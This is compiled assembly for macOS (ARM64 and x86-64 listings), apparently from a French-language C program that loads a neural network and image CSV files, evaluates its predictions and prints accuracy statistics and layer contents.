ldursw x10, [x29, #-20]
mul x10, x10, x11
str w8, [x9, x10]
b LBB36_3
LBB36_3: ; in Loop: Header=BB36_1 Depth=1
ldur w8, [x29, #-20]
add w8, w8, #1
stur w8, [x29, #-20]
b LBB36_1
LBB36_4:
ldur x0, [x29, #-16]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _printNetwork ; -- Begin function printNetwork
.p2align 2
_printNetwork: ; @printNetwork
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #8]
ldr x0, [sp, #8]
bl _estVideNetwork
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB37_2
b LBB37_1
LBB37_1:
adrp x0, l_.str.84@PAGE
add x0, x0, l_.str.84@PAGEOFF
bl _printf
b LBB37_6
LBB37_2:
ldr x8, [sp, #8]
ldr x8, [x8, #8]
str x8, [sp]
b LBB37_3
LBB37_3: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB37_5
b LBB37_4
LBB37_4: ; in Loop: Header=BB37_3 Depth=1
ldr x8, [sp]
ldr x0, [x8]
bl _printLayers
ldr x8, [sp]
ldr x8, [x8, #8]
str x8, [sp]
b LBB37_3
LBB37_5:
adrp x0, l_.str.45@PAGE
add x0, x0, l_.str.45@PAGEOFF
bl _printf
b LBB37_6
LBB37_6:
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _printLayers ; -- Begin function printLayers
.p2align 2
_printLayers: ; @printLayers
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur wzr, [x29, #-12]
adrp x0, l_.str.87@PAGE
add x0, x0, l_.str.87@PAGEOFF
bl _printf
stur wzr, [x29, #-12]
b LBB38_1
LBB38_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-12]
ldur x9, [x29, #-8]
ldr w9, [x9, #16]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB38_4
b LBB38_2
LBB38_2: ; in Loop: Header=BB38_1 Depth=1
ldur x8, [x29, #-8]
ldr x8, [x8]
ldursw x9, [x29, #-12]
ldr d0, [x8, x9, lsl #3]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.88@PAGE
add x0, x0, l_.str.88@PAGEOFF
bl _printf
b LBB38_3
LBB38_3: ; in Loop: Header=BB38_1 Depth=1
ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB38_1
LBB38_4:
adrp x0, l_.str.45@PAGE
add x0, x0, l_.str.45@PAGEOFF
bl _printf
stur wzr, [x29, #-12]
b LBB38_5
LBB38_5: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-12]
ldur x9, [x29, #-8]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB38_8
b LBB38_6
LBB38_6: ; in Loop: Header=BB38_5 Depth=1
ldur w9, [x29, #-12]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.89@PAGE
add x0, x0, l_.str.89@PAGEOFF
bl _printf
ldur x8, [x29, #-8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-12]
mov x10, #48
mul x9, x9, x10
add x0, x8, x9
bl _printNeurone
b LBB38_7
LBB38_7: ; in Loop: Header=BB38_5 Depth=1
ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB38_5
LBB38_8:
adrp x0, l_.str.45@PAGE
add x0, x0, l_.str.45@PAGEOFF
bl _printf
adrp x0, l_.str.90@PAGE
add x0, x0, l_.str.90@PAGEOFF
bl _printf
stur wzr, [x29, #-12]
b LBB38_9
LBB38_9: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-12]
ldur x9, [x29, #-8]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB38_12
b LBB38_10
LBB38_10: ; in Loop: Header=BB38_9 Depth=1
ldur x8, [x29, #-8]
ldr x8, [x8, #8]
ldursw x9, [x29, #-12]
ldr d0, [x8, x9, lsl #3]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.88@PAGE
add x0, x0, l_.str.88@PAGEOFF
bl _printf
b LBB38_11
LBB38_11: ; in Loop: Header=BB38_9 Depth=1
ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB38_9
LBB38_12:
adrp x0, l_.str.45@PAGE
add x0, x0, l_.str.45@PAGEOFF
bl _printf
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _printNeurone ; -- Begin function printNeurone
.p2align 2
_printNeurone: ; @printNeurone
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur wzr, [x29, #-12]
ldur x8, [x29, #-8]
ldr d0, [x8, #8]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.85@PAGE
add x0, x0, l_.str.85@PAGEOFF
bl _printf
stur wzr, [x29, #-12]
b LBB39_1
LBB39_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-12]
ldur x9, [x29, #-8]
ldr w9, [x9]
subs w9, w9, #1
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB39_4
b LBB39_2
LBB39_2: ; in Loop: Header=BB39_1 Depth=1
ldur x8, [x29, #-8]
ldr x8, [x8, #16]
ldursw x9, [x29, #-12]
ldr d0, [x8, x9, lsl #3]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.85@PAGE
add x0, x0, l_.str.85@PAGEOFF
bl _printf
b LBB39_3
LBB39_3: ; in Loop: Header=BB39_1 Depth=1
ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB39_1
LBB39_4:
ldur x8, [x29, #-8]
ldr w8, [x8]
subs w8, w8, #1
cset w8, lt
tbnz w8, #0, LBB39_6
b LBB39_5
LBB39_5:
ldur x8, [x29, #-8]
ldr x8, [x8, #16]
ldur x9, [x29, #-8]
ldr w9, [x9]
subs w9, w9, #1
ldr d0, [x8, w9, sxtw #3]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.86@PAGE
add x0, x0, l_.str.86@PAGEOFF
bl _printf
b LBB39_6
LBB39_6:
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "File error "
l_.str.1: ; @.str.1
.asciz "Reading error "
l_.str.2: ; @.str.2
.asciz "'\n';"
l_.str.3: ; @.str.3
.asciz "w"
l_.str.4: ; @.str.4
.asciz "Erreur d'ouverture de votre fichier du fichier \n"
l_.str.5: ; @.str.5
.asciz "%d;%d\n"
l_.str.6: ; @.str.6
.asciz "%lf;"
l_.str.7: ; @.str.7
.asciz "%lf\n"
l_.str.8: ; @.str.8
.asciz "le nombre de argc : %d"
l_.str.9: ; @.str.9
.asciz "load"
l_.str.10: ; @.str.10
.asciz "network"
l_.str.11: ; @.str.11
.asciz "r"
l_.str.12: ; @.str.12
.asciz "Erreur d'ouveture du fichier : %s\n"
l_.str.13: ; @.str.13
.asciz "img"
l_.str.14: ; @.str.14
.asciz "Erreur-->argv[2] : n'est pas conforme.\nargv[2] = network, pour charger reseau\nargv[2] = img ,pour charger une image de test\n"
l_.str.15: ; @.str.15
.asciz "Merci de verifier les arguments de ia.exe \n"
l_.str.16: ; @.str.16
.asciz "Erreur : initNode "
l_.str.17: ; @.str.17
.asciz "Erreur : initListe() \n"
l_.str.18: ; @.str.18
.asciz "%d "
l_.str.19: ; @.str.19
.asciz "\n\n\n"
l_.str.20: ; @.str.20
.asciz "Error could not allocate memory !\n"
l_.str.21: ; @.str.21
.asciz "wb"
l_.str.22: ; @.str.22
.asciz "Error: could not open file '%s' !\n"
l_.str.23: ; @.str.23
.asciz ";"
l_.str.24: ; @.str.24
.asciz "Erreur-->argv[2] : %s n'est pas conforme.\nargv[2] = network, pour charger reseau\nargv[2] = img ,pour charger une image de test\n"
l_.str.25: ; @.str.25
.asciz "Fichier %s Ouvert , en cours de chargement...\n"
l_.str.26: ; @.str.26
.asciz "verifie.csv"
l_.str.27: ; @.str.27
.asciz "fin de chargement\n"
l_.str.28: ; @.str.28
.asciz "Fichier d'image Ouvert, en cours de chargement...\n"
l_.str.29: ; @.str.29
.asciz "fin de chargement de %s \n"
l_.str.30: ; @.str.30
.asciz "Fichier de network Ouvert, en cours de chargement...\n"
l_.str.31: ; @.str.31
.asciz "vous avez charger le reseau et une base d'images pour le avaluer le reseau\n"
l_.str.32: ; @.str.32
.asciz "format d'affichage pendant l'evaluation \n"
l_.str.33: ; @.str.33
.asciz "Numero image ==> prediction: classimg : statut : taux de reussite : taux erreur : nbre ok : nbre mauvaise prediction"
l_.str.34: ; @.str.34
.asciz "non"
l_.str.35: ; @.str.35
.asciz "\nImage %-6d: "
l_.str.36: ; @.str.36
.asciz "==> %d\t"
l_.str.37: ; @.str.37
.asciz "%d\t"
l_.str.38: ; @.str.38
.asciz "ok"
l_.str.39: ; @.str.39
.asciz "%s\t"
l_.str.40: ; @.str.40
.asciz "\t%-7g%%"
l_.str.41: ; @.str.41
.asciz "\t%-7g%% "
l_.str.42: ; @.str.42
.asciz "\t %d"
l_.str.43: ; @.str.43
.asciz "\n\nVoulez vous continuer le pas a pas (OUI/NON)? : NON = different de OUI \n"
l_.str.44: ; @.str.44
.asciz "OUI"
l_.str.45: ; @.str.45
.asciz "\n"
l_.str.46: ; @.str.46
.asciz "=========Apres Evaluation de %d images Nous avons ===========\n"
l_.str.47: ; @.str.47
.asciz "Taux d'erreur : %g%%\n"
l_.str.48: ; @.str.48
.asciz "Taux de reussite : %g%%\n"
l_.str.49: ; @.str.49
.asciz "Nombre d'image avec une bonne prediction : %d\n"
l_.str.50: ; @.str.50
.asciz "Nombre d'image avec une mauvaise prediction : %d\n"
l_.str.51: ; @.str.51
.asciz "************Fin Pour le Reseau ==> Statistique !*****************"
l_.str.52: ; @.str.52
.asciz "\nVoulez vous continuer sur la statistique des couches du reseau (OUI/NON)? : NON = different de OUI \n"
l_.str.53: ; @.str.53
.asciz "\nVoulez vous charger une image (OUI/NON)? : NON = different de OUI \n"
l_.str.54: ; @.str.54
.asciz "Entrer le nom du fichier a charger \n"
l_.str.55: ; @.str.55
.asciz "Erreur : erreur d'ouverture du fichier "
l_.str.56: ; @.str.56
.asciz "Vous avez choisie de ne pas charger une image donc nous allons utiliser notre image\n"
l_.str.57: ; @.str.57
.asciz "images_data.csv"
l_.str.58: ; @.str.58
.asciz "Erreur : erreur d'ouverture du fichier image dans InterloadImage"
l_.str.59: ; @.str.59
.asciz "continuer ?\n Oui = La touche entree\t Non = Crtl+c\n"
l_.str.60: ; @.str.60
.asciz "\nVoulez vous charger le Network (OUI/NON)? \n"
l_.str.61: ; @.str.61
.asciz "1 = OUI et 0 = NON\n"
l_.str.62: ; @.str.62
.asciz "Entrer le nom du fichier network \n"
l_.str.63: ; @.str.63
.asciz "Erreur : erreur d'ouverture du fichier network,merci de verifier l'emplacement du fichier "
l_.str.64: ; @.str.64
.asciz "Chargement de %s en cours \n"
l_.str.65: ; @.str.65
.asciz "Vous avez choisie de ne pas charger le network donc nous allons utiliser notre network"
l_.str.66: ; @.str.66
.asciz "network_100_30_10.csv"
l_.str.67: ; @.str.67
.asciz "\t--- Donnees pour les biais ---\n"
l_.str.68: ; @.str.68
.asciz "-Couche [%d] \n"
l_.str.69: ; @.str.69
.asciz " Nombre de Neurones : %d \n"
l_.str.70: ; @.str.70
.asciz " Valeur moyenne : %g\n"
l_.str.71: ; @.str.71
.asciz " Valeur de la deviation standard : %g\n"
l_.str.72: ; @.str.72
.asciz " Valeur max : %g\n"
l_.str.73: ; @.str.73
.asciz " Valeur min : %g\n"
l_.str.74: ; @.str.74
.asciz "\t--- Donnees pour les poids ---\n"
l_.str.75: ; @.str.75
.asciz " Nombre de Neurones : %5d \n"
l_.str.76: ; @.str.76
.asciz " Valeur min : %g\n"
l_.str.77: ; @.str.77
.asciz "Voudriez-vous charger un autre fichier Reseaux ou utiliser notre fichier csv.\nTaper sur [O/o] pour oui ou autre pour non ? "
l_.str.78: ; @.str.78
.asciz "Veuiller saisir le nom du fichier : "
l_.str.79: ; @.str.79
.asciz "[-] Erreur pendant l'ouverture du fichier.\n"
l_.str.80: ; @.str.80
.asciz "**********************************************************\n"
l_.str.81: ; @.str.81
.asciz "\tRESEAU AVEC %d COUCHES\n"
l_.str.82: ; @.str.82
.asciz "network_30_10.csv"
l_.str.83: ; @.str.83
.asciz "Appuyez sur entrer pour voir la suite \n"
l_.str.84: ; @.str.84
.asciz "le reseau est vide !!\n"
l_.str.85: ; @.str.85
.asciz "%g ;"
l_.str.86: ; @.str.86
.asciz "%g \n"
l_.str.87: ; @.str.87
.asciz "Layers : Inputs \n"
l_.str.88: ; @.str.88
.asciz "%g "
l_.str.89: ; @.str.89
.asciz "neurone %d \n"
l_.str.90: ; @.str.90
.asciz "Layers : Outputs \n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
movl -8(%rbp), %edi
movq -16(%rbp), %rsi
callq _Interface
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function Interface
LCPI1_0:
.quad 0x4059000000000000 ## double 100
.section __TEXT,__text,regular,pure_instructions
.globl _Interface
.p2align 4, 0x90
_Interface: ## @Interface
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $144, %rsp
movl %edi, -4(%rbp)
movq %rsi, -16(%rbp)
movq $0, -24(%rbp)
movq $0, -32(%rbp)
cmpl $4, -4(%rbp)
jne LBB1_13
## %bb.1:
movq -16(%rbp), %rax
movq 8(%rax), %rdi
leaq L_.str.9(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB1_13
## %bb.2:
movq -16(%rbp), %rax
movq 16(%rax), %rdi
leaq L_.str.10(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB1_6
## %bb.3:
movq -16(%rbp), %rax
movq 24(%rax), %rdi
leaq L_.str.11(%rip), %rsi
callq _fopen
movq %rax, -24(%rbp)
cmpq $0, -24(%rbp)
jne LBB1_5
## %bb.4:
movq -16(%rbp), %rax
movq 24(%rax), %rsi
leaq L_.str.12(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _printf
movl $1, %edi
callq _exit
LBB1_5:
jmp LBB1_12
LBB1_6:
movq -16(%rbp), %rax
movq 16(%rax), %rdi
leaq L_.str.13(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB1_10
## %bb.7:
movq -16(%rbp), %rax
movq 24(%rax), %rdi
leaq L_.str.11(%rip), %rsi
callq _fopen
movq %rax, -24(%rbp)
cmpq $0, -24(%rbp)
jne LBB1_9
## %bb.8:
movq -16(%rbp), %rax
movq 24(%rax), %rsi
leaq L_.str.12(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _printf
movl $1, %edi
callq _exit
LBB1_9:
jmp LBB1_11
LBB1_10:
movq -16(%rbp), %rax
movq 16(%rax), %rsi
leaq L_.str.24(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _printf
movl $1, %edi
callq _exit
LBB1_11:
jmp LBB1_12
LBB1_12:
jmp LBB1_14
LBB1_13:
leaq L_.str.15(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _printf
movl $1, %edi
callq _exit
LBB1_14:
callq _initNetwork
movq %rax, -40(%rbp)
callq _initListe
movq %rax, -48(%rbp)
movq -16(%rbp), %rax
movq 16(%rax), %rdi
leaq L_.str.10(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB1_16
## %bb.15:
movq -16(%rbp), %rax
movq 24(%rax), %rsi
leaq L_.str.25(%rip), %rdi
movb $0, %al
callq _printf
movq -40(%rbp), %rdi
movq -24(%rbp), %rsi
callq _loadNetwork
movq -40(%rbp), %rdi
leaq L_.str.26(%rip), %rsi
callq _VerificationReseau
leaq L_.str.27(%rip), %rdi
movb $0, %al
callq _printf
callq _avancerGetchar
callq _InterLoadImage
movq %rax, -32(%rbp)
leaq L_.str.28(%rip), %rdi
movb $0, %al
callq _printf
movq -32(%rbp), %rdi
movq -48(%rbp), %rsi
callq _loadImg
leaq L_.str.27(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB1_19
LBB1_16:
movq -16(%rbp), %rax
movq 16(%rax), %rdi
leaq L_.str.13(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB1_18
## %bb.17:
movq -16(%rbp), %rax
movq 24(%rax), %rsi
leaq L_.str.25(%rip), %rdi
movb $0, %al
callq _printf
movq -24(%rbp), %rdi
movq -48(%rbp), %rsi
callq _loadImg
movq -16(%rbp), %rax
movq 24(%rax), %rsi
leaq L_.str.29(%rip), %rdi
movb $0, %al
callq _printf
callq _avancerGetchar
callq _InterLoadNetwork
movq %rax, -32(%rbp)
leaq L_.str.30(%rip), %rdi
movb $0, %al
callq _printf
movq -40(%rbp), %rdi
movq -32(%rbp), %rsi
callq _loadNetwork
leaq L_.str.27(%rip), %rdi
movb $0, %al
callq _printf
LBB1_18:
jmp LBB1_19
LBB1_19:
leaq L_.str.31(%rip), %rdi
movb $0, %al
callq _printf
movl $80, %edi
callq _malloc
movq %rax, -56(%rbp)
movq $0, -64(%rbp)
xorps %xmm0, %xmm0
movsd %xmm0, -72(%rbp)
xorps %xmm0, %xmm0
movsd %xmm0, -80(%rbp)
movl $0, -84(%rbp)
movl $0, -88(%rbp)
movl $6, %edi
movl $1, %esi
callq _calloc
movq %rax, -96(%rbp)
movl $0, -100(%rbp)
movl $1024, %edi ## imm = 0x400
callq _malloc
movq %rax, -112(%rbp)
movl $1024, %edi ## imm = 0x400
callq _malloc
movq %rax, -120(%rbp)
movq -48(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -128(%rbp)
leaq L_.str.32(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.33(%rip), %rdi
movb $0, %al
callq _printf
LBB1_20: ## =>This Inner Loop Header: Depth=1
cmpq $0, -128(%rbp)
je LBB1_29
## %bb.21: ## in Loop: Header=BB1_20 Depth=1
callq _getchar
movq -96(%rbp), %rdi
leaq L_.str.34(%rip), %rsi
movq $-1, %rdx
callq ___strcpy_chk
movq -128(%rbp), %rax
movq 16(%rax), %rdi
movq -128(%rbp), %rax
movl 24(%rax), %esi
callq _imgNormalisation
movq %rax, -64(%rbp)
movq -40(%rbp), %rdi
movq -64(%rbp), %rsi
callq _evalNetwork
movq %rax, -56(%rbp)
movl -88(%rbp), %eax
addl $1, %eax
movl %eax, -88(%rbp)
movl -88(%rbp), %esi
leaq L_.str.35(%rip), %rdi
movb $0, %al
callq _printf
movq -56(%rbp), %rdi
callq _imgClass
movl %eax, %esi
leaq L_.str.36(%rip), %rdi
movb $0, %al
callq _printf
movq -128(%rbp), %rax
movl 12(%rax), %esi
leaq L_.str.37(%rip), %rdi
movb $0, %al
callq _printf
movq -128(%rbp), %rax
movl 12(%rax), %eax
movl %eax, -132(%rbp) ## 4-byte Spill
movq -56(%rbp), %rdi
callq _imgClass
movl %eax, %ecx
movl -132(%rbp), %eax ## 4-byte Reload
cmpl %ecx, %eax
jne LBB1_23
## %bb.22: ## in Loop: Header=BB1_20 Depth=1
movl -84(%rbp), %eax
addl $1, %eax
movl %eax, -84(%rbp)
movq -96(%rbp), %rdi
leaq L_.str.38(%rip), %rsi
movq $-1, %rdx
callq ___strcpy_chk
LBB1_23: ## in Loop: Header=BB1_20 Depth=1
movq -96(%rbp), %rsi
leaq L_.str.39(%rip), %rdi
movb $0, %al
callq _printf
cvtsi2sdl -84(%rbp), %xmm0
cvtsi2sdl -88(%rbp), %xmm1
divsd %xmm1, %xmm0
movsd LCPI1_0(%rip), %xmm1 ## xmm1 = mem[0],zero
mulsd %xmm1, %xmm0
movsd %xmm0, -72(%rbp)
movsd -72(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.40(%rip), %rdi
movb $1, %al
callq _printf
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
subsd -72(%rbp), %xmm0
movsd %xmm0, -80(%rbp)
movsd -80(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.41(%rip), %rdi
movb $1, %al
callq _printf
movl -84(%rbp), %esi
leaq L_.str.42(%rip), %rdi
movb $0, %al
callq _printf
movl -88(%rbp), %esi
subl -84(%rbp), %esi
leaq L_.str.42(%rip), %rdi
movb $0, %al
callq _printf
movq -128(%rbp), %rax
movq 32(%rax), %rax
movq %rax, -128(%rbp)
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
cmpl $100, -100(%rbp)
jne LBB1_28
## %bb.24: ## in Loop: Header=BB1_20 Depth=1
leaq L_.str.43(%rip), %rdi
movb $0, %al
callq _printf
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
callq _rewind
movq -120(%rbp), %rdi
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdx
movl $1024, %esi ## imm = 0x400
callq _fgets
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
callq _rewind
movq -120(%rbp), %rdi
callq _InterfaceControleChaine
movq %rax, -112(%rbp)
movq -112(%rbp), %rdi
callq _toUpper
movq -112(%rbp), %rdi
leaq L_.str.44(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB1_26
## %bb.25: ## in Loop: Header=BB1_20 Depth=1
movl $0, -100(%rbp)
jmp LBB1_27
LBB1_26:
jmp LBB1_29
LBB1_27: ## in Loop: Header=BB1_20 Depth=1
jmp LBB1_28
LBB1_28: ## in Loop: Header=BB1_20 Depth=1
jmp LBB1_20
LBB1_29:
jmp LBB1_30
LBB1_30: ## =>This Inner Loop Header: Depth=1
cmpq $0, -128(%rbp)
je LBB1_34
## %bb.31: ## in Loop: Header=BB1_30 Depth=1
movq -96(%rbp), %rdi
leaq L_.str.34(%rip), %rsi
movq $-1, %rdx
callq ___strcpy_chk
movq -128(%rbp), %rax
movq 16(%rax), %rdi
movq -128(%rbp), %rax
movl 24(%rax), %esi
callq _imgNormalisation
movq %rax, -64(%rbp)
movq -40(%rbp), %rdi
movq -64(%rbp), %rsi
callq _evalNetwork
movq %rax, -56(%rbp)
movl -88(%rbp), %eax
addl $1, %eax
movl %eax, -88(%rbp)
movl -88(%rbp), %esi
leaq L_.str.35(%rip), %rdi
movb $0, %al
callq _printf
movq -56(%rbp), %rdi
callq _imgClass
movl %eax, %esi
leaq L_.str.36(%rip), %rdi
movb $0, %al
callq _printf
movq -128(%rbp), %rax
movl 12(%rax), %esi
leaq L_.str.37(%rip), %rdi
movb $0, %al
callq _printf
movq -128(%rbp), %rax
movl 12(%rax), %eax
movl %eax, -136(%rbp) ## 4-byte Spill
movq -56(%rbp), %rdi
callq _imgClass
movl %eax, %ecx
movl -136(%rbp), %eax ## 4-byte Reload
cmpl %ecx, %eax
jne LBB1_33
## %bb.32: ## in Loop: Header=BB1_30 Depth=1
movl -84(%rbp), %eax
addl $1, %eax
movl %eax, -84(%rbp)
movq -96(%rbp), %rdi
leaq L_.str.38(%rip), %rsi
movq $-1, %rdx
callq ___strcpy_chk
LBB1_33: ## in Loop: Header=BB1_30 Depth=1
movq -96(%rbp), %rsi
leaq L_.str.39(%rip), %rdi
movb $0, %al
callq _printf
cvtsi2sdl -84(%rbp), %xmm0
cvtsi2sdl -88(%rbp), %xmm1
divsd %xmm1, %xmm0
movsd LCPI1_0(%rip), %xmm1 ## xmm1 = mem[0],zero
mulsd %xmm1, %xmm0
movsd %xmm0, -72(%rbp)
movsd -72(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.40(%rip), %rdi
movb $1, %al
callq _printf
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
subsd -72(%rbp), %xmm0
movsd %xmm0, -80(%rbp)
movsd -80(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.41(%rip), %rdi
movb $1, %al
callq _printf
movl -84(%rbp), %esi
leaq L_.str.42(%rip), %rdi
movb $0, %al
callq _printf
movl -88(%rbp), %esi
subl -84(%rbp), %esi
leaq L_.str.42(%rip), %rdi
movb $0, %al
callq _printf
movq -128(%rbp), %rax
movq 32(%rax), %rax
movq %rax, -128(%rbp)
jmp LBB1_30
LBB1_34:
leaq L_.str.45(%rip), %rdi
movb $0, %al
callq _printf
movl -88(%rbp), %esi
leaq L_.str.46(%rip), %rdi
movb $0, %al
callq _printf
movsd -80(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.47(%rip), %rdi
movb $1, %al
callq _printf
movsd -72(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.48(%rip), %rdi
movb $1, %al
callq _printf
movl -84(%rbp), %esi
leaq L_.str.49(%rip), %rdi
movb $0, %al
callq _printf
movl -88(%rbp), %esi
subl -84(%rbp), %esi
leaq L_.str.50(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.51(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.52(%rip), %rdi
movb $0, %al
callq _printf
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
callq _rewind
movq -120(%rbp), %rdi
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdx
movl $1024, %esi ## imm = 0x400
callq _fgets
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
callq _rewind
movq -120(%rbp), %rdi
callq _InterfaceControleChaine
movq %rax, -112(%rbp)
movq -112(%rbp), %rdi
callq _toUpper
movq -112(%rbp), %rdi
leaq L_.str.44(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB1_36
## %bb.35:
callq _InfosStatistiques
LBB1_36:
addq $144, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _initNetwork ## -- Begin function initNetwork
.p2align 4, 0x90
_initNetwork: ## @initNetwork
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $24, %edi
callq _malloc
movq %rax, -8(%rbp)
movq -8(%rbp), %rax
movl $0, (%rax)
movq -8(%rbp), %rax
movq $0, 8(%rax)
movq -8(%rbp), %rax
movq $0, 16(%rax)
movq -8(%rbp), %rax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _loadNetwork ## -- Begin function loadNetwork
.p2align 4, 0x90
_loadNetwork: ## @loadNetwork
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $96, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
cmpq $0, -16(%rbp)
jne LBB3_2
## %bb.1:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rsi
leaq L_.str(%rip), %rdi
callq _fputs
movl $1, %edi
callq _exit
LBB3_2:
movq -16(%rbp), %rdi
xorl %eax, %eax
movl %eax, %esi
movl $2, %edx
callq _fseek
movq -16(%rbp), %rdi
callq _ftell
movq %rax, -24(%rbp)
movq -16(%rbp), %rdi
callq _rewind
movq -24(%rbp), %rdi
shlq $0, %rdi
callq _malloc
movq %rax, -32(%rbp)
movq -32(%rbp), %rdi
movq -24(%rbp), %rdx
movq -16(%rbp), %rcx
movl $1, %esi
callq _fread
movq %rax, -40(%rbp)
movq -40(%rbp), %rax
cmpq -24(%rbp), %rax
je LBB3_4
## %bb.3:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rsi
leaq L_.str.1(%rip), %rdi
callq _fputs
movl $1, %edi
callq _exit
LBB3_4:
movl $0, -44(%rbp)
movl $0, -48(%rbp)
LBB3_5: ## =>This Inner Loop Header: Depth=1
movq -32(%rbp), %rax
movslq -48(%rbp), %rcx
cmpb $0, (%rax,%rcx)
je LBB3_10
## %bb.6: ## in Loop: Header=BB3_5 Depth=1
movq -32(%rbp), %rax
movslq -48(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $10, %eax
jne LBB3_8
## %bb.7: ## in Loop: Header=BB3_5 Depth=1
movl -44(%rbp), %eax
addl $1, %eax
movl %eax, -44(%rbp)
